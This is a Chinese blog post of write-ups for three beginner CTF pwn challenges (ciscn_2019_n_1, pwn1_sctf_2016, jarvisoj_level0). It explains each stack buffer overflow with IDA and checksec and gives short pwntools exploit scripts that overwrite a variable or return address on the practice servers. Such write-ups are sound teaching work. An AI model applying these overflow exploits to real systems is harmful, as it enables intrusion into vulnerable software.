pwn——ciscn_2019_n_1#pwn1_sctf_2016#jarvisoj_level0

最新推荐文章于 2024-05-13 16:17:54 发布
最新推荐文章于 2024-05-13 16:17:54 发布
阅读量564 收藏
点赞数
分类专栏: CTF 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LSYZWF/article/details/120979561
版权

文章目录

ciscn_2019_n_1

题目

题目链接:https://buuoj.cn/challenges#ciscn_2019_n_1

解答

1、打开IDA进行分析
在这里插入图片描述
发现函数gets和系统命令cat
此函数的大致意思是输入v1的值,然后判断v2,故存在栈溢出使得v2的内存中的值为11.28125
2、判断偏移地址
在这里插入图片描述
v2的内存地址距离v1首地址的偏移量是30h-04h=2ch
3、gdb调试一波
在这里插入图片描述
没有堆栈溢出保护
4、编写脚本
11.28125的十六进制可以在IDA中查看
将鼠标光标放在相应指令上
在这里插入图片描述
点击跳转查看

在这里插入图片描述

from pwn import *
p = remote('node4.buuoj.cn',25698)
payload = 'a'*0x2c+p32(0x41348000)
p.sendline(payload)
p.interactive()

在这里插入图片描述
参考连接:https://www.cnblogs.com/vict0r/p/13786557.html

pwn1_sctf_2016

题目

题目链接:https://buuoj.cn/challenges#pwn1_sctf_2016

解答

1、先checksec
在这里插入图片描述
32位,没有堆栈溢出保护
2、IDA分析
找到main函数
在这里插入图片描述
里面没有什么内容,只调用vuln函数,分析这个函数
同时shift+F12查看字符串
在这里插入图片描述
发现了系统调用,查看该字符串的应用处
在get_flag函数中找到,其中地址在08048f13
在这里插入图片描述
回到vuln函数,F5分析
在这里插入图片描述
发现了fgets函数,考虑一波栈溢出,但是此输入受到了限制,输入字符不能超过32,但是s的地址空间大小为3ch
在这里插入图片描述
在这里插入图片描述
由于s的地址空间大小有60,而只能输入少于32个字符,不能造成栈溢出,但是返现代码中还有其他功能函数replace,意思是如果输入中有I,则会替换成you,正好60个大小空间可以输入20个I来替换成20个you,这样就能填充s的空间
3、编写脚本

from pwn import *
p = remote('node4.buuoj.cn',25866)
payload = 'I'*20+'aaaa'+p32(0x08048F13)
p.sendline(payload)
p.interactive()

在这里插入图片描述
得到flag

提示:如果看不懂replace函数,可以运行试一下文件的实际效果
在这里插入图片描述
在这里插入图片描述
可以发现将I转化成了you
参考链接:https://www.cnblogs.com/Jlay/p/pwn_wp1.html

jarvisoj_level0

题目

链接:https://buuoj.cn/challenges#jarvisoj_level0

解答

1、checksec
在这里插入图片描述
64位,没有堆栈溢出保护
这里也可以用PE等工具检测,ubantu16环境下,运行一下看效果
在这里插入图片描述
2、IDA分析
查看main函数
在这里插入图片描述
调用了vulnerable_function()函数
在这里插入图片描述
发现了read函数,表示从输入流中读取输入存到buf,读取最大字符为200h,而buf的空间大小为80h,常规操作,返回地址距离s首地址的偏移量为80h+8
发现了系统调用命令,地址为0x40059A
在这里插入图片描述

3、编写脚本

from pwn import *
p = remote('node4.buuoj.cn',29562)
payload = 'a'*0x80+'a'*8+p64(0x40059A)
p.sendline(payload)
p.interactive()

在这里插入图片描述
拿到flag

知识点

C语言read()函数:用于读取打开文件的内容
函数名:read
头文件:<io.h>
函数原型: int read(int handle,void *buf,int len);
功能:用于读取打开文件的内容
参数:int handle 为要读取的文件
void *buf 为要将读取的内容保存的缓冲区
int len 读取文件的长度
返回值:返回实际读取的字节数

DiliLearngent
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[CISCN 2019华北]PWN1
m0_74355719的博客
11-29 410
【代码】[CISCN 2019华北]PWN1。
2021_09_15_ciscn_2019_n_1
m0_51187558的博客
09-15 2738
ciscn_2019_n_1 前言 每日一题pwn方向的第二题。也是初入漏洞利用的一道特别基础的题。 大家都应该尝试着做过了上一道,也就是test your nc。从解法来说其实那道题的难度真的只是半脚踩在入门的门坎上。就像wp中所说的那样,目前pwn题的核心是通过漏洞挖掘与利用来提权,而nc这道题可以说是不需要任何漏洞的挖掘与利用,做出这道题并不代表你已经入门pwn了。 虽然如此,从ciscn_2019_n_1这道题开始,我们真正要开始尝试迈过pwn题的那一道门槛,面对一些简单的漏洞进行利用了。 做题流程
[CISCN 2019华北]PWN1 CTF—PWN
最新发布
m0_72904009的博客
05-13 380
[CISCN 2019华北]PWN1 CTF—PWN
BUUCTF ciscn_2019_n_1
RookieMOR的博客
05-14 616
1.下载文件,用checksec一下: 2.用IDA64查看,进入func函数: 当v2=11.28125时获得flag,但只有v1的输入,没有v2输入。因为有一个gets函数,点击v1,v2可以知道,v1与v2差44个字节,可以通过输入v1的值去改变v2的值,实现栈溢出。 查看汇编可以看到有一个uconiss的比较指令,把xmm0与cs:dword_4007F4,由movss可以知道xmme0是v1或v2的值,那么点击dword_4007F4 看到一个 dd ,百度一下可以知道,.
ciscn_2019_n_1
weixin_52034946的博客
01-15 420
检查,64位 ida查看 又是gets函数,思路来了,一直输入挤满栈,直到v2处输入11.28125 11.28125的16进制转换是 0x41348000h 脚本 from pwn import* r = remote(“node3.buuoj.cn”,29950) flag_addr = 0x41348000 payload = “a”*(0x30-0x4)+p64(flag_addr) r.sendline(payload) r.interactive() 0x30 - 0x4 就是v1到v2处的空
ciscn_2019_n_3
12-30
ciscn(全国大学生信息安全竞赛),2019年的一道题目,涉及到fastbin堆漏洞的利用。由于调用了system函数,所以漏洞利用的难度不大,推荐初学者练习。题解链接:...
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
1. "PWN.c":这很可能是 AVR 单片机的 C 语言源代码,实现了 PWM 输出功能。我们可以预期代码中包含了初始化 PWM 定时器、设置 PWM 配置、以及可能的 PWM 寄存器操作等内容。 2. "www.pudn.com.txt":这个文件可能是...
ciscn-2019-pwn
11-29
【标题】"ciscn-2019-pwn"是一个与网络安全竞赛相关的主题,尤其聚焦于"Pwn"类别,这通常指的是破解或利用程序漏洞来获取系统控制权的挑战。2019年的CISCN(中国互联网安全大会)可能是这个挑战的背景,它是一个汇集...
mc.zip_package4dr_pwm_pwn发生器_verilog hdl_wayyy7
09-23
标题中的"mc.zip_package4dr_pwm_pwn发生器_verilog hdl_wayyy7"暗示我们正在讨论一个用Verilog编写的PWM(脉冲宽度调制)信号发生器,其特性包括4位的分辨率,可能是通过4个D触发器(D Flip-flops)来实现的。...
PWM.rar_ARM7 汇编_PWN_pwm arm7
09-22
在ARM7处理器上实现PWM接口,需要理解ARM7架构、汇编语言以及PWN的具体工作原理。 ARM7是ARM公司设计的一系列32位RISC微处理器,以其低功耗、高性能和广泛应用而闻名。在ARM7处理器中,开发者可以使用C语言或汇编...
baby_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
baby_pwn 赛题 ciscn 2019 第十二届全国大学生信息安全竞赛
【BUUCTF - PWNciscn_2019_n_1
古月浪子的博客
03-19 3569
checksec一下 IDA打开,发现如果满足的条件达成,就能get flag 找到栈溢出漏洞,输入可以覆盖到v2 写代码把11.28125在内存中的十六进制表示出来 from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.log_level='debug' ...
[每日一PWN]BUUCTF ciscn_2019_n_1
qq_55233040的博客
11-21 421
这道题双解,一种ret2text,另一种就是单纯的覆盖数据改变判断结果。
CTF在线练习平台
weixin_41949487的博客
02-25 4314
CTF在线练习平台 IDF实验室: http://ctf.idf.cn/ XCTF_OJ竞赛平台:http://oj.xctf.org.cn/problem_archives 网络信息安全攻防学习平台:http://hackinglab.cn/ OWASP在线网络安全攻防实验室:http://www.owasp.org.cn/owasp-project/security-l...
BUUCTF pwn——ciscn_2019_n_1
CNS-Enterprise BCC-1701-J
03-11 277
BUUCTF 做题练习
NSSCTF PWN (入门)
农夫果园好好喝的博客
09-18 1639
这不是欺负老实人嘛~
[CISCN2019 华北赛区 Day1 Web1]Dropbox
沐目的博客
10-31 6796
知识点轰炸 1.1 open_basedir 在in_set这个函数中,可以设置php的一些配置,其中就包括open_basedir ,用来限制当前程序可以访问的目录。后来问了一下朱师傅,了解到:它是可以访问设置目录下的所有下级目录。 若"open_basedir = /dir/user", 那么目录 “/dir/user” 和 “/dir/other"都是可以访问的。所以如果要将访问限制在仅为指...
jarvisoj_level1
08-28
- *1* *3* [[BUUCTF-pwn]——jarvisoj_level1](https://blog.csdn.net/Y_peak/article/details/114916604)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值